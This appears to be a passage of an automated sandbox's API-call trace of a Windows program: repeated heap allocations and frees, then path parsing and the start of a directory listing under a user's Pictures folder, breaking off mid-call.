[0193.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.539] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\") returned="P5pCqlWF\\" [0193.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0193.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.540] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0193.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42028 [0193.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.540] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0193.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42028 | out: hHeap=0x6a0000) returned 1 [0193.540] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0193.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0193.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.541] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0193.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.541] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0193.541] PathFindFileNameW (pszPath="") returned="" [0193.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.541] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfe2cd40, ftCreationTime.dwHighDateTime=0x1d8a43a, ftLastAccessTime.dwLowDateTime=0x8bbdeef0, ftLastAccessTime.dwHighDateTime=0x1d8a4c6, ftLastWriteTime.dwLowDateTime=0x8bbdeef0, ftLastWriteTime.dwHighDateTime=0x1d8a4c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0193.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.544] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfe2cd40, ftCreationTime.dwHighDateTime=0x1d8a43a, ftLastAccessTime.dwLowDateTime=0x8bbdeef0, ftLastAccessTime.dwHighDateTime=0x1d8a4c6, ftLastWriteTime.dwLowDateTime=0x8bbdeef0, ftLastWriteTime.dwHighDateTime=0x1d8a4c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.544] FindNextFileW (in: hFindFile=0x2cbfa10, 